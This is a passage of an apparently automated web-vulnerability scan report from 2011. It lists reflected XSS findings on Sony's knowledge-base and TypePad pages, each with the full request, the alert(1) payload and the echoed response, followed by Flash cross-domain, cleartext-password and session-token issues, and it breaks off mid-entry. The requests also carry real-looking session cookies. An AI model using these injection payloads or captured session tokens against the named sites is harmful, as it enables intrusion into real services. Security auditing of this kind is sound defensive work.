1.45. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0b2e"-alert(1)-"8ea97393960 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294&f0b2e"-alert(1)-"8ea97393960 =1 HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Date: Tue, 06 Sep 2011 18:52:11 GMT Content-Length: 15708 <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#FFFFFF" text=...[SNIP]... l = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294&f0b2e"-alert(1)-"8ea97393960 =1"; viewDocUrl = viewDocUrl.replace("&highlight=off",""); var strValue="on"; strUrl = viewDocUrl + "&highlight=" + strValue; ...[SNIP]...
1.46. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the sliceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86b7a'%3balert(1)//5e4fc876c82 was submitted in the sliceId parameter. This input was echoed as 86b7a';alert(1)//5e4fc876c82 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_186b7a'%3balert(1)//5e4fc876c82 &docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1 Host: www.kb.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848 Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Date: Tue, 06 Sep 2011 18:56:16 GMT Connection: close <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#FFFFFF" text=...[SNIP]... , 'no'); break; case 'bookmark' : addBookmark('http://www.kb.sony.com:80/selfservice/dynamickc.do?cmd=show&forward=nonthreadedKC&docType=kc&externalId=${extId}&sliceId=pdfPage_186b7a';alert(1)//5e4fc876c82 '); break; case 'full' : openWnd('http://www.kb.sony.com:80/selfservice/dynamickc.do?cmd=show&forward=nonthreadedKC&docType=kc&externalId=${extId}&sliceId=pdfPage_186b7a';alert(1)//5e...[SNIP]...
1.47. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the sliceId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d3ec"-alert(1)-"1b2827b41a1 was submitted in the sliceId parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_15d3ec"-alert(1)-"1b2827b41a1 &docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1 Host: www.kb.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848 Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Date: Tue, 06 Sep 2011 18:56:15 GMT Connection: close <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#FFFFFF" text=...[SNIP]... ipt"> function documentCommands(cmd){ switch (cmd){ case 'hilite' : var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=BNP1USESpdf&sliceId=pdfPage_15d3ec"-alert(1)-"1b2827b41a1 &docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848"; viewDocUrl = viewDocUrl.replace("&highlight=off",""); var strV...[SNIP]...
1.48. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [stateId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the stateId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8a7b"-alert(1)-"defc0e3e037 was submitted in the stateId parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294d8a7b"-alert(1)-"defc0e3e037 HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Date: Tue, 06 Sep 2011 18:52:08 GMT Connection: close <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#FFFFFF" text=...[SNIP]... rl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294d8a7b"-alert(1)-"defc0e3e037 "; viewDocUrl = viewDocUrl.replace("&highlight=off",""); var strValue="on"; strUrl = viewDocUrl + "&highlight=" + strValue; ...[SNIP]...
1.49. http://www.typepad.com/services/toolbar [autofollowed parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.typepad.com
Path:
/services/toolbar
Issue detail
The value of the autofollowed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e142b%3balert(1)//db967658d0d was submitted in the autofollowed parameter. This input was echoed as e142b;alert(1)//db967658d0d in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/toolbar?blog_id=6a010535f33a5b970c010535ecb398970b&asset_id=&atype=index&to=http%3A%2F%2Fblog.proofpoint.com%2F&autofollowed=0e142b%3balert(1)//db967658d0d &safe_to_modify_body=0 HTTP/1.1 Host: www.typepad.com Proxy-Connection: keep-alive Referer: http://blog.proofpoint.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Date: Tue, 06 Sep 2011 20:53:00 GMT Server: Apache X-Webserver: oak-tp-app002 Cache-Control: private Pragma: no-cache Vary: cookie,negotiate,accept-language,Accept-Encoding Content-Language: en Content-Length: 14888 Content-Type: text/html; charset=utf-8 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:at="http://www.sixapart.c...[SNIP]... lorAnim = YAHOO.util.ColorAnim, Easing = YAHOO.util.Easing, Cookie = YAHOO.util.Cookie, TPToolbar = {}; TPToolbar = { params: { autofollowed: 0e142b;alert(1)//db967658d0d , blog_user_xid: '6p010535f33a5b970c', display: 0, entry_xid: '', logged_in: 0, safe_to_modify_body: '0', permal...[SNIP]...
2. Flash cross-domain policy
previous
next
There are 4 instances of this issue:
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user. Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
2.1. http://www.viddler.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.viddler.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.viddler.com
Response
HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Tue, 06 Sep 2011 20:52:09 GMT Content-Type: application/xml Connection: close X-Viddler-Node: viddler_a Accept-Ranges: bytes ETag: W/"80-1311663400000" Last-Modified: Tue, 26 Jul 2011 06:56:40 GMT Content-Length: 80 <cross-domain-policy> <allow-access-from domain="* "/> </cross-domain-policy>
2.2. http://blog.trendmicro.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: blog.trendmicro.com
Response
HTTP/1.0 200 OK Server: nginx/0.8.54 Content-Type: text/xml Last-Modified: Fri, 27 Nov 2009 13:41:16 GMT ETag: "11c044-128-4795a7226b700" X-Varnish: 1696291533 Cache-Control: no-store Expires: Tue, 06 Sep 2011 18:16:27 GMT Date: Tue, 06 Sep 2011 18:16:27 GMT Content-Length: 296 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.trendmicro.de " secure="true" />...[SNIP]... <allow-access-from domain="*.rocket-media.info " secure="true" />...[SNIP]...
2.3. http://wd.sharethis.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://wd.sharethis.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: wd.sharethis.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Tue, 06 Sep 2011 17:46:04 GMT Content-Type: text/xml Content-Length: 330 Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="*.meandmybadself.com " /> <allow-access-from domain="*.sharethis.com " />...[SNIP]...
2.4. http://www.typepad.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.typepad.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.typepad.com
Response
HTTP/1.0 200 OK Date: Tue, 06 Sep 2011 20:52:09 GMT Server: Apache X-Webserver: oak-tp-app017 Cache-Control: private Pragma: no-cache Vary: cookie Content-Length: 401 Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="static.typepad.com " /> <allow-...[SNIP]... <allow-access-from domain="*.sixapart.com " /> <allow-access-from domain="*.videoegg.com " /> <allow-access-from domain="*.saymedia.com " />...[SNIP]...
3. Cleartext submission of password
previous
next
There are 3 instances of this issue:
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
3.1. http://webconnect.sendouts.com/login.aspx
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://webconnect.sendouts.com
Path:
/login.aspx
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://webconnect.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= The form contains the following password field:
Request
GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1 Host: webconnect.sendouts.com Proxy-Connection: keep-alive Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml" Date: Tue, 06 Sep 2011 20:31:59 GMT Content-Length: 6707 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>LogIn</title...[SNIP]... <body><form name="WebForm1" method="post" action="login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=" onsubmit="javascript:return WebForm_OnSubmit();" id="WebForm1"> <div>...[SNIP]... <br /> <input name="txtPassword" type="password" id="txtPassword" /> <span id="RequiredFieldValidator2" class="ErrorMsg" style="color:Red;display:none;">...[SNIP]...
3.2. http://www.javalobby.org/articles/acegisecurity/part1.jsp
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/articles/acegisecurity/part1.jsp
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.javalobby.org/forums/login.jspa The form contains the following password field:
Request
GET /articles/acegisecurity/part1.jsp HTTP/1.1 Host: www.javalobby.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Resin/3.2.1 Content-Type: text/html; charset=ISO-8859-1 Date: Tue, 06 Sep 2011 17:55:34 GMT Content-Length: 33566 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Securing Your Java Applications - Acegi Security Style</title> <meta http-equiv="content-type"...[SNIP]... <div class="welcomebar"> <form action="/forums/login.jspa" method="post" name="loginform"> Username/Email: <input type="text" name="username" size="20" maxlength="150" value="" tabindex="1" id="username01" /> Password: <input type="password" name="password" size="20" maxlength="150" value="" tabindex="2" id="password01" /> <input type="hidden" name="autoLogin" id="autoLogin01" value="true" />...[SNIP]...
3.3. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html The form contains the following password field:
Request
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1 Host: www.javaworld.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:45:52 GMT Server: Apache/2.2.3 (CentOS) Accept-Ranges: bytes Cache-Control: public, max-age=600 Cneonction: close Content-Type: text/html; charset=UTF-8 Content-Length: 67949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/h...[SNIP]... <div id="login" name="login" method="post" action="/community/rtn_login08.php"> <form id="form_login"> <fieldset>...[SNIP]... <td> <input name="upass" type="password" id="jq_password" class="inputtext" /> </td>...[SNIP]...
4. Session token in URL
previous
next
There are 4 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
4.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/CategoryDisplay
Issue detail
The response contains the following links that appear to contain session tokens:http://store.sony.com/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1
Request
